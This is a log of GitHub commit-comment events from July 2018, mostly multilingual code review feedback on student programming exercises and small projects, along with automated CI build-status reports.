{"id":"7965474022","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708409,"position":17,"line":17,"path":"clockcss.css","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:53:05Z","updated_at":"2018-07-14T08:53:05Z","author_association":"COLLABORATOR","body":"Тут аналогично:\r\nmargin: 0 auto;"}},"created_at":"2018-07-14T08:53:05Z"}
{"id":"7965474626","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29708410,"position":null,"line":null,"path":null,"commit_id":"4ad3a82a75436861b7a5fd0be57babd923d38356","created_at":"2018-07-14T08:53:39Z","updated_at":"2018-07-14T08:53:39Z","author_association":"NONE","body":"修正ありがとうございます。結果の文字列の埋め込み、良い感じだと思います。\r\n\r\n先日修正前にしたコメントで、1つ謝罪させてください。\r\ndisplay()メソッドを使う旨は元々大舛先生からそういう話があったようですね。\r\nそれを知らずに大変失礼しました。\r\n\r\n僕自身が大舛先生に比べpythonに対して不勉強な部分が多く、pythonを実装時の最適解がまだまだ良く分かっていない部分があり、時たまこんな風に混乱を招いてしまっている部分があります。\r\n(教える立場にいてこういうこと言うのも非常にお恥ずかしいですが…)\r\n皆さんに教えることを通じてではありますが、僕もまだまだ一緒に勉強させてもらいたいと思っています。\r\n今後ともよろしくお付き合いください。"}},"created_at":"2018-07-14T08:53:39Z"}
{"id":"7965474885","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708411,"position":11,"line":11,"path":"clockhtml.html","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:53:54Z","updated_at":"2018-07-14T08:53:54Z","author_association":"COLLABORATOR","body":"Для формы лучше задать имя, чтобы в дальнейшем через него было проще обращаться к ее элементам (например, input-у, кнопке и т.д.)"}},"created_at":"2018-07-14T08:53:54Z"}
{"id":"7965475863","type":"CommitCommentEvent","actor":{"login":"Kasiak22"},"repo":{"name":"udacity/ud843_DidYouFeelIt"},"payload":{"comment":{"id":29708413,"position":null,"line":null,"path":null,"commit_id":"0a9e6c2338969c6ad0311f5b2b09ea3895a3f5fa","created_at":"2018-07-14T08:54:50Z","updated_at":"2018-07-14T08:54:50Z","author_association":"NONE","body":"I get error:\r\n\r\ncom/example/android/didyoufeelit/MainActivity.java |  \r\n-- | --\r\nerror: cannot find symbol static makeHttpRequest |  \r\nerror: cannot find symbol static extractFeatureFromJson |  \r\n\r\nAlthough methods are in Utils.java\r\n\r\n"}},"created_at":"2018-07-14T08:54:50Z"}
{"id":"7965476252","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708414,"position":12,"line":12,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:55:12Z","updated_at":"2018-07-14T08:55:12Z","author_association":"COLLABORATOR","body":"Для каждой переменной используй отдельное ключевое слово (var, let или const), т.е.:\r\nvar canvas = ...;\r\nvar context = ...;\r\n\r\nИ лучше уже смотреть в сторону новых переменных (let и const), т.к. var практически устарел."}},"created_at":"2018-07-14T08:55:12Z"}
{"id":"7965476608","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18001-ikeshiro/programming-term2"},"payload":{"comment":{"id":29708416,"position":null,"line":null,"path":null,"commit_id":"6d37148703bfb170b07b2029153075c9af2a4bb9","created_at":"2018-07-14T08:55:35Z","updated_at":"2018-07-14T08:55:35Z","author_association":"NONE","body":"修正の結果OKです。動きも問題なしですね。\r\n提出ありがとうございます。"}},"created_at":"2018-07-14T08:55:35Z"}
{"id":"7965478742","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708419,"position":35,"line":35,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:57:33Z","updated_at":"2018-07-14T08:57:33Z","author_association":"COLLABORATOR","body":"Переменные именуй только camelCase (если это var или let), т.е.:\r\nvar tSec;\r\nvar tMin;\r\n\r\nЕсли это константа (const), то они именуются через UPPERCASE с символом нижнего подчеркивания, т.е.:\r\nconst SOME_CONSTANT = ... ;"}},"created_at":"2018-07-14T08:57:33Z"}
{"id":"7965478845","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708420,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T08:57:39Z","updated_at":"2018-07-14T08:57:39Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2317 of 2317 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T08:57:39Z"}
{"id":"7965479308","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708421,"position":49,"line":49,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:58:04Z","updated_at":"2018-07-14T08:58:04Z","author_association":"COLLABORATOR","body":"Комментарии в коде оставляй на английском языке"}},"created_at":"2018-07-14T08:58:04Z"}
{"id":"7965479335","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"s18011/programming-term2"},"payload":{"comment":{"id":29708422,"position":null,"line":null,"path":null,"commit_id":"26399fcdced6b22512d5c3a4af1e5292be768431","created_at":"2018-07-14T08:58:06Z","updated_at":"2018-07-14T08:58:06Z","author_association":"NONE","body":"細かい内容は指示した通りなので、あとはサンプルレイアウトの上2行と、左の部分が出来れば完成ですね。\r\n\r\nこの時点で1点指摘。\r\n9行目のprint()は特に何も出力しないので、書く意味特にないですよ。そこは削除お願いします。"}},"created_at":"2018-07-14T08:58:06Z"}
{"id":"7965479389","type":"CommitCommentEvent","actor":{"login":"BlackPhrase"},"repo":{"name":"klange/toaruos"},"payload":{"comment":{"id":29708423,"position":29,"line":17,"path":"README.md","commit_id":"3ff9d2406bc84d9021ecba4f7aafd29d05b6b0b9","created_at":"2018-07-14T08:58:09Z","updated_at":"2018-07-14T08:58:09Z","author_association":"NONE","body":"typo"}},"created_at":"2018-07-14T08:58:09Z"}
{"id":"7965480502","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708425,"position":44,"line":44,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T08:59:15Z","updated_at":"2018-07-14T08:59:15Z","author_association":"COLLABORATOR","body":"Такие длинные выражения лучше разбивать так, чтобы каждый параметр начинался с новой строки и табуляции (тут ее нет, так как гитхаб убирает автоматом), т.е.:\r\n\r\ncontext.lineTo(\r\n    param1,\r\n    param2,\r\n   ...\r\n);"}},"created_at":"2018-07-14T08:59:15Z"}
{"id":"7965481966","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18015/programming-term2"},"payload":{"comment":{"id":29708435,"position":null,"line":null,"path":null,"commit_id":"ee7fcd8aa929985ef3ab8bca55fc1607da08a7ec","created_at":"2018-07-14T09:00:25Z","updated_at":"2018-07-14T09:00:25Z","author_association":"NONE","body":"結果OKです。提出ありがとうございます。\r\n改善点挙げるとしてら、結果表示の\r\n\"私は{}を出した。君の負けです\"\r\nの部分はifより前に変数として定義をしておくと3回も繰り返し書かなくていいと思います。"}},"created_at":"2018-07-14T09:00:25Z"}
{"id":"7965484071","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708440,"position":78,"line":78,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T09:01:55Z","updated_at":"2018-07-14T09:01:55Z","author_association":"COLLABORATOR","body":"Необязательно писать window.setInterval, можно оставить просто setInterval. Так гораздо удобней.\r\n\r\nИ эту запись можно сократить до одной строки:\r\nsetInterval(displayCanvas, 1000);\r\n\r\ndisplayCanvas и так функция, нет смысла оборачивать ее в анонимную функцию (но это справедливо только если она не принимает никаких агрументов!)"}},"created_at":"2018-07-14T09:01:55Z"}
{"id":"7965484112","type":"CommitCommentEvent","actor":{"login":"markusfalk"},"repo":{"name":"johnpapa/angular-first-look-examples"},"payload":{"comment":{"id":29708442,"position":null,"line":null,"path":null,"commit_id":"f74ce7056cfb84d4ad721411c17b148425031b07","created_at":"2018-07-14T09:01:57Z","updated_at":"2018-07-14T09:01:57Z","author_association":"NONE","body":"Thanks! learned something here :)"}},"created_at":"2018-07-14T09:01:57Z"}
{"id":"7965484629","type":"CommitCommentEvent","actor":{"login":"AlexMozheiko"},"repo":{"name":"angrenkov/courses"},"payload":{"comment":{"id":29708443,"position":81,"line":81,"path":"clockjs.js","commit_id":"ffee8668ea3d288356d6713a5005c198df45a60b","created_at":"2018-07-14T09:02:22Z","updated_at":"2018-07-14T09:02:22Z","author_association":"COLLABORATOR","body":"Функции именуй через глагол, т.е.:\r\nfunction setTime () { ... }"}},"created_at":"2018-07-14T09:02:22Z"}
{"id":"7965486060","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29708448,"position":5,"line":28,"path":"src/io/jiyuujin/java/day3/Introduction.java","commit_id":"88ffe3ca5b25e439a740b161789b59c168a8b5bc","created_at":"2018-07-14T09:03:32Z","updated_at":"2018-07-14T09:03:32Z","author_association":"COLLABORATOR","body":"index の宣言位置はここじゃない\r\nループの中で宣言する（詳細には｛｝ブロック内だけど）は、処理が通るたびに変数の領域確保が行われます、非効率"}},"created_at":"2018-07-14T09:03:32Z"}
{"id":"7965486881","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18015/programming-term2"},"payload":{"comment":{"id":29708451,"position":null,"line":null,"path":null,"commit_id":"ee7fcd8aa929985ef3ab8bca55fc1607da08a7ec","created_at":"2018-07-14T09:04:15Z","updated_at":"2018-07-14T09:04:15Z","author_association":"NONE","body":"ちょっと変数名の付け方について。\r\n僕の主観ですがzixyankenはちょっとダサい。。。って思います。\r\nxで小文字にするのはキータイピング的な書き方であって、表記にこういう書き方はあまりしない方が、個人的にはいいと思います。\r\n\r\n「じゃ」、「じゅ」、「じょ」は、\r\n\"ja\",\"ju\",\"jo\" あるいは \"jya\",\"jyu\",\"jyo\"\r\nって書く方が一般的と思います。\r\n\r\nあ、ついでに。2行目の\r\n> zixyanken = str(zixyanken)\r\nですが、1行目のinputの戻り値自体str型なので、変換する必要はないです。"}},"created_at":"2018-07-14T09:04:15Z"}
{"id":"7965487122","type":"CommitCommentEvent","actor":{"login":"caorol"},"repo":{"name":"jiyuujin/ProgateJava"},"payload":{"comment":{"id":29708453,"position":5,"line":28,"path":"src/io/jiyuujin/java/day3/Introduction.java","commit_id":"88ffe3ca5b25e439a740b161789b59c168a8b5bc","created_at":"2018-07-14T09:04:26Z","updated_at":"2018-07-14T09:04:26Z","author_association":"COLLABORATOR","body":"あと index と i を分ける意味は？"}},"created_at":"2018-07-14T09:04:26Z"}
{"id":"7965487282","type":"CommitCommentEvent","actor":{"login":"endo64"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29708454,"position":13,"line":693,"path":"runtime/datatypes/date.reds","commit_id":"0cedc0175e7c1c06c6f7eb0afde311ac0619881b","created_at":"2018-07-14T09:04:34Z","updated_at":"2018-07-14T09:04:34Z","author_association":"CONTRIBUTOR","body":"But now `random` **just** uses the time part and not using the date part at all and returns the same value:\r\n\r\n```\r\nd1: 2018-01-01/01:02:03\r\nd2: 2018-02-02/01:02:03\r\nrandom/seed d1 probe random 100 random/seed d2 random 100\r\n67\r\n== 67\r\n```"}},"created_at":"2018-07-14T09:04:34Z"}
{"id":"7965491713","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708460,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-14T09:08:25Z","updated_at":"2018-07-14T09:08:25Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2686 of 2686 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-14T09:08:25Z"}
{"id":"7965491795","type":"CommitCommentEvent","actor":{"login":"ankushransiwal"},"repo":{"name":"ankushransiwal/Request_Data_from_Web"},"payload":{"comment":{"id":29708461,"position":13,"line":42,"path":"app/src/main/java/com/example/android/restful/utils/HttpHelper.java","commit_id":"a2ea7e33999b548c483252abbf2e9aa2dbe5e9da","created_at":"2018-07-14T09:08:29Z","updated_at":"2018-07-14T09:08:29Z","author_association":"OWNER","body":"The fucking mistake was in this removal of shitty fucking code"}},"created_at":"2018-07-14T09:08:29Z"}
{"id":"7965491971","type":"CommitCommentEvent","actor":{"login":"arvindpdmn"},"repo":{"name":"arvindpdmn/sample"},"payload":{"comment":{"id":29708462,"position":null,"line":null,"path":null,"commit_id":"a0ef86ce5f8a1776b2c3dd0184ae5e377672e4c5","created_at":"2018-07-14T09:08:39Z","updated_at":"2018-07-14T09:08:39Z","author_association":"OWNER","body":"Looks good! This will solve all our problems!!!"}},"created_at":"2018-07-14T09:08:39Z"}
{"id":"7965492740","type":"CommitCommentEvent","actor":{"login":"sunnykeshri"},"repo":{"name":"sunnykeshri/sample"},"payload":{"comment":{"id":29708464,"position":null,"line":null,"path":null,"commit_id":"925e59144f90fa47e81c0fc9a1b2abc2e711ac78","created_at":"2018-07-14T09:09:22Z","updated_at":"2018-07-14T09:09:22Z","author_association":"OWNER","body":"this is cool"}},"created_at":"2018-07-14T09:09:22Z"}
{"id":"7965492851","type":"CommitCommentEvent","actor":{"login":"sangr25"},"repo":{"name":"sangr25/meetup1"},"payload":{"comment":{"id":29708465,"position":null,"line":null,"path":null,"commit_id":"df40a8331b8897aff52048d3995e17a4703c29a2","created_at":"2018-07-14T09:09:30Z","updated_at":"2018-07-14T09:09:30Z","author_association":"OWNER","body":"abc"}},"created_at":"2018-07-14T09:09:30Z"}
{"id":"7965493217","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29708466,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-14T09:09:52Z","updated_at":"2018-07-14T09:09:52Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T09:09:52Z"}
{"id":"7965493276","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/CoffeeToCode"},"payload":{"comment":{"id":29708467,"position":32,"line":199,"path":"C2C/RazorPages/Scripts/CanvasFronted.js","commit_id":"d1c99b2d1e2516ba40e53fdc2800c07d243094bd","created_at":"2018-07-14T09:09:56Z","updated_at":"2018-07-14T09:09:56Z","author_association":"COLLABORATOR","body":"More cool way is to use ```data.forEach()``` here)"}},"created_at":"2018-07-14T09:09:56Z"}
{"id":"7965494564","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18002/programming-term2"},"payload":{"comment":{"id":29708469,"position":null,"line":null,"path":null,"commit_id":"e9550ad322b3fa0f03cf81072b47938e08dc0438","created_at":"2018-07-14T09:11:10Z","updated_at":"2018-07-14T09:11:10Z","author_association":"NONE","body":"サンプルと比べスペースの桁数が多いですが、整形されているのでOKとします。\r\nprintメソッドのendパラメータを使って改行させないという発想にしたのはいいと思います。\r\n\r\nコード上の改善点ですが、インデントが深すぎます。\r\n原則スペース4つ分にしましょう。"}},"created_at":"2018-07-14T09:11:10Z"}
{"id":"7965495385","type":"CommitCommentEvent","actor":{"login":"orangudan"},"repo":{"name":"pydanny/django-widget-override-test-case"},"payload":{"comment":{"id":29708533,"position":null,"line":null,"path":null,"commit_id":"bd63483b070707b3bb064845b56f14fb75eb1158","created_at":"2018-07-14T09:11:58Z","updated_at":"2018-07-14T09:11:58Z","author_association":"NONE","body":"@pydanny Thank you for this!! Got this working in my project now +1 Overriding the built-in django templates is much too hidden away in the docs..."}},"created_at":"2018-07-14T09:11:58Z"}
{"id":"7965497170","type":"CommitCommentEvent","actor":{"login":"fcray"},"repo":{"name":"robert/robert.github.com"},"payload":{"comment":{"id":29708622,"position":null,"line":null,"path":null,"commit_id":"ef6995b6dfcf4210dbc14f3790c29b55bb808de3","created_at":"2018-07-14T09:13:38Z","updated_at":"2018-07-14T09:13:38Z","author_association":"NONE","body":"Hello good day \r\nHow are you..i would love to ask you few questions if you really dont mind \r\nYou can write me at bodundeebenz@yahoo.com \r\nFor few questions\r\nThanks \r\nAnd hoping to hear from you"}},"created_at":"2018-07-14T09:13:38Z"}
{"id":"7965497628","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"tmrttmrt/opentx"},"payload":{"comment":{"id":29708623,"position":null,"line":null,"path":null,"commit_id":"1e7edd072a68cfb82d7470cdac70e5721604faae","created_at":"2018-07-14T09:14:07Z","updated_at":"2018-07-14T09:14:07Z","author_association":"NONE","body":"but one space before the `{`\r\nwe have some guidelines in our wiki in case you need "}},"created_at":"2018-07-14T09:14:07Z"}
{"id":"7965499327","type":"CommitCommentEvent","actor":{"login":"fcray"},"repo":{"name":"CojocariIon/Gulp-Web-Developer"},"payload":{"comment":{"id":29708628,"position":null,"line":null,"path":null,"commit_id":"9552f9f65e55406191b0d9a04b9f93665d0c07db","created_at":"2018-07-14T09:15:43Z","updated_at":"2018-07-14T09:15:43Z","author_association":"NONE","body":"Hello.... How are you.... \r\nI love to ask few questions please if you realyy dont mind \r\nYou can write me bodundeebenz@yahoo.com if you really dont mind\r\n"}},"created_at":"2018-07-14T09:15:43Z"}
{"id":"7965499884","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18010/programming-term2"},"payload":{"comment":{"id":29708629,"position":null,"line":null,"path":null,"commit_id":"9cb68f9768f521722e6089dd25332ebfefa58e72","created_at":"2018-07-14T09:16:14Z","updated_at":"2018-07-14T09:16:14Z","author_association":"NONE","body":"コード、結果とも問題なしです。\r\nというか、僕講義中にほぼ答え言っちゃってますね^^; 僕が思ってた通りのコードだと思います。"}},"created_at":"2018-07-14T09:16:14Z"}
{"id":"7965502122","type":"CommitCommentEvent","actor":{"login":"Profpatsch"},"repo":{"name":"purescript/purescript-prelude"},"payload":{"comment":{"id":29708630,"position":null,"line":null,"path":null,"commit_id":"3b0d306c0fa20af4803fdad2313f250d4e388d35","created_at":"2018-07-14T09:18:20Z","updated_at":"2018-07-14T09:18:20Z","author_association":"NONE","body":"I will create a pull request."}},"created_at":"2018-07-14T09:18:20Z"}
{"id":"7965502530","type":"CommitCommentEvent","actor":{"login":"luca020400"},"repo":{"name":"luca020400/android_kernel_oneplus_sdm845"},"payload":{"comment":{"id":29708631,"position":32,"line":1339,"path":"drivers/staging/qcacld-3.0/Kbuild","commit_id":"9764b1ccfcef1ff11a1183b1cc6d83229c6d4eb6","created_at":"2018-07-14T09:18:44Z","updated_at":"2018-07-14T09:18:44Z","author_association":"OWNER","body":"CONFIG_QCA_CLD_DEBUG\r\nderp"}},"created_at":"2018-07-14T09:18:44Z"}
{"id":"7965502597","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29708632,"position":null,"line":null,"path":null,"commit_id":"893e9cf0f431f36e614fd37fcd82b31c9435160d","created_at":"2018-07-14T09:18:48Z","updated_at":"2018-07-14T09:18:48Z","author_association":"MEMBER","body":"@noname12123 FYI"}},"created_at":"2018-07-14T09:18:48Z"}
{"id":"7965503097","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708633,"position":null,"line":null,"path":null,"commit_id":"666f04b3aed85ab2c033f1cf1adafbcda12da3eb","created_at":"2018-07-14T09:19:19Z","updated_at":"2018-07-14T09:19:19Z","author_association":"MEMBER","body":"#1089 #1122  #1130 #1132 #1134"}},"created_at":"2018-07-14T09:19:19Z"}
{"id":"7965504400","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29708639,"position":null,"line":null,"path":null,"commit_id":"de33cb9050a82e8937fb01925e75e71f511b9ef0","created_at":"2018-07-14T09:20:32Z","updated_at":"2018-07-14T09:20:32Z","author_association":"NONE","body":"このコード、11行目に何かが足りないですね。\r\n割とイージーミスなので、ちょっと考えてみてください。\r\nヒント：\"+\"という文字列を連結する箇所"}},"created_at":"2018-07-14T09:20:32Z"}
{"id":"7965513916","type":"CommitCommentEvent","actor":{"login":"ericxinzhang"},"repo":{"name":"umijs/umi-dva-user-dashboard"},"payload":{"comment":{"id":29708658,"position":null,"line":null,"path":null,"commit_id":"f81d36c639d35e67db8b2d0a65b561e4af203eb1","created_at":"2018-07-14T09:29:33Z","updated_at":"2018-07-14T09:29:33Z","author_association":"NONE","body":"> @sorrycc loading状态什么情况下会改变，代码里没看到修改loading的地方啊，自动修改的话又是在什么时候修改呢，能细说一下吗\r\n\r\n还没机会看源码，但是我估计dva在每个model的异步effect方法执行的之前，将`state.loading.models[namespace] 设置成true, 执行完毕之后设置成false."}},"created_at":"2018-07-14T09:29:33Z"}
{"id":"7965517274","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29708664,"position":null,"line":null,"path":null,"commit_id":"c63f11e8eff30c648def9b5037d6a196d6d232e5","created_at":"2018-07-14T09:31:51Z","updated_at":"2018-07-14T09:31:51Z","author_association":"NONE","body":"うーん、ループのネストで同じカウンタiを使うのは良くないですね。\r\nまた、折角ループの中にいるのに、その中で1〜9という固定の値を登場させてるのもあんまりよろしくないです。\r\n\r\nヒント：3行目にて掛ける数をi、5行目にて掛けられる数をjにしてみてください。\r\n\r\nあと、変数aは使用していないようですね。"}},"created_at":"2018-07-14T09:31:51Z"}
{"id":"7965517414","type":"CommitCommentEvent","actor":{"login":"visayafan"},"repo":{"name":"zgq354/weibo-rss"},"payload":{"comment":{"id":29708665,"position":null,"line":null,"path":null,"commit_id":"bb562e9637b847d612433dc653383610325e867b","created_at":"2018-07-14T09:31:58Z","updated_at":"2018-07-14T09:31:58Z","author_association":"CONTRIBUTOR","body":"我明白了，你们习惯卡片视图是吧？我用的是列表视图。卡片视图那个表情图标封面太恐怖了。"}},"created_at":"2018-07-14T09:31:58Z"}
{"id":"7965518159","type":"CommitCommentEvent","actor":{"login":"JimboJoe"},"repo":{"name":"VSLCatena/ldap_login"},"payload":{"comment":{"id":29708667,"position":null,"line":null,"path":null,"commit_id":"f9cd063125b11c6a9e06d0a2f7b3573fc6165543","created_at":"2018-07-14T09:32:37Z","updated_at":"2018-07-14T09:32:37Z","author_association":"NONE","body":"I'm sorry I missed your reply.\r\nI can't say, as I don't know why this code was changed (to restrict empty user names)..."}},"created_at":"2018-07-14T09:32:37Z"}
{"id":"7965518717","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18022/programming-term2"},"payload":{"comment":{"id":29708668,"position":null,"line":null,"path":null,"commit_id":"38a75332c0c9dc959cf1c1edbd24b89654ec054f","created_at":"2018-07-14T09:33:10Z","updated_at":"2018-07-14T09:33:10Z","author_association":"NONE","body":"これもforと同様ですね。出題内容としては\r\n「ループを2重に使う」\r\nことでした。"}},"created_at":"2018-07-14T09:33:10Z"}
{"id":"7965521528","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708670,"position":28,"line":28,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:35:52Z","updated_at":"2018-07-14T09:35:52Z","author_association":"NONE","body":"'s' yerine b, 'si' yerine o denilebilir."}},"created_at":"2018-07-14T09:35:52Z"}
{"id":"7965521958","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708672,"position":31,"line":31,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:36:15Z","updated_at":"2018-07-14T09:36:15Z","author_association":"NONE","body":"whereNull metodu tercih edilebilir."}},"created_at":"2018-07-14T09:36:15Z"}
{"id":"7965522007","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":29708673,"position":null,"line":null,"path":null,"commit_id":"7e01526c3b4dd67456828325371c29901632b9d1","created_at":"2018-07-14T09:36:18Z","updated_at":"2018-07-14T09:36:18Z","author_association":"MEMBER","body":"#930 #1093 #1115 #1133"}},"created_at":"2018-07-14T09:36:18Z"}
{"id":"7965522201","type":"CommitCommentEvent","actor":{"login":"youle31"},"repo":{"name":"UPBGE/testfiles"},"payload":{"comment":{"id":29708674,"position":null,"line":null,"path":null,"commit_id":"d17cc7944f62c4ade99739d3100e6a3b679ffc15","created_at":"2018-07-14T09:36:29Z","updated_at":"2018-07-14T09:36:29Z","author_association":"NONE","body":"Awesome! This git repo is amazing, thanks very much!"}},"created_at":"2018-07-14T09:36:29Z"}
{"id":"7965522628","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708675,"position":30,"line":30,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:36:52Z","updated_at":"2018-07-14T09:36:52Z","author_association":"NONE","body":"auth() burada kullanılmayabilir. sıkı sıkıya bağlılık yerine parametre olarak alınabilir."}},"created_at":"2018-07-14T09:36:52Z"}
{"id":"7965523251","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708676,"position":29,"line":29,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:37:26Z","updated_at":"2018-07-14T09:37:26Z","author_association":"NONE","body":"='e gerek olmayabilir."}},"created_at":"2018-07-14T09:37:26Z"}
{"id":"7965523652","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708677,"position":36,"line":36,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:37:49Z","updated_at":"2018-07-14T09:37:49Z","author_association":"NONE","body":"$active_basket instanceof ile type kontrolü yapılabilir."}},"created_at":"2018-07-14T09:37:49Z"}
{"id":"7965524792","type":"CommitCommentEvent","actor":{"login":"irfanevrens"},"repo":{"name":"anilozmen/Laravel-ECommerce-Iyzico"},"payload":{"comment":{"id":29708678,"position":39,"line":39,"path":"app/Basket.php","commit_id":"07eaf79e84277feb7dc5d921c87aac06befbec1f","created_at":"2018-07-14T09:38:50Z","updated_at":"2018-07-14T09:38:50Z","author_association":"NONE","body":"Bu tarz kodlar ayrı bir sınıfa taşınabilir. Bir de bazıları static bazıları nonstatic yazılmış."}},"created_at":"2018-07-14T09:38:50Z"}
